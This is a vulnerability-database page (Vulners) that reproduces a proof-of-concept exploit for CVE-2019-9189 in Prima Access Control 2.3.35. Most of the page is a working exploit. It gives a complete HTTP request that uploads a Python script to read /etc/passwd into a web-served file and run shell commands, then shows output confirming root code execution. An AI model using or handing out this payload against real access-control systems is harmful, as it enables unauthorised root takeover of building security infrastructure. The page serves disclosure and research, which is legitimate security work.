Vulners
Lucene search
Prima Access Control 2.3.35 Script Upload Remote Code Execution
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Prima Access Control 2.3.35 - Arbitrary File Upload Vulnerability | 12 Nov 201900:00 | – | zdt |
| FlexAir Access Control 2.4.9api3 - Remote Code Execution Exploit | 12 Nov 201900:00 | – | zdt |
 | Prima Systems FlexAir Script Upload Execution Vulnerability | 10 Jun 201900:00 | – | cnvd |
 | CVE-2019-9189 | 5 Jun 201917:20 | – | cve |
 | CVE-2019-9189 | 5 Jun 201917:20 | – | cvelist |
 | Prima Access Control 2.3.35 - Arbitrary File Upload | 12 Nov 201900:00 | – | exploitdb |
| FlexAir Access Control 2.4.9api3 - Remote Code Execution | 12 Nov 201900:00 | – | exploitdb |
 | FlexAir Access Control 2.4.9api3 - Remote Code Execution | 12 Nov 201900:00 | – | exploitpack |
| Prima Access Control 2.3.35 - Arbitrary File Upload | 12 Nov 201900:00 | – | exploitpack |
 | Prima Systems FlexAir | 30 Jul 201900:00 | – | ics |
10
`
Prima Access Control 2.3.35 Authenticated Python Script Upload Root RCE
CVE: CVE-2019-9189
Advisory: https://applied-risk.com/resources/ar-2019-007
Paper: https://applied-risk.com/resources/i-own-your-building-management-system
Discovered by Gjoko 'LiquidWorm' Krstic
---
POST /bin/sysfcgi.fx HTTP/1.1
Host: 192.168.13.37
Connection: keep-alive
Content-Length: 572
Origin: https://192.168.13.37
Session-ID: 5682699
User-Agent: Mozi-Mozi/44.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/html, */*; q=0.01
Session-Pc: 2
X-Requested-With: XMLHttpRequest
Referer: https://192.168.13.37/app/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: G_ENABLED_IDPS=google
<requests><request name="PythonScriptUpload"><param name="DestinationHwID" value="1"/><param name="FileName" value="test_python.py"/><param name="Content" value="#!/usr/bin/python
#
# test script
#

import sys,os

with open("/etc/passwd") as f:
 with open("/www/pages/app/images/logos/testingus2.txt", "w") as f1:
 for line in f:
 f1.write(line)


os.system("id;uname -a >> /www/pages/app/images/logos/testingus2.txt")"/></request></requests>
Result:
$ curl https://192.168.13.37/app/images/logos/testingus2.txt
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
python:x:1000:1000:python:/home/python:/bin/false
admin:x:1001:1001:Linux User,,,:/home/admin:/bin/sh
uid=0(root) gid=0(root) groups=0(root),10(wheel)
Linux DemoMaster214 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Nov 2019 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.19417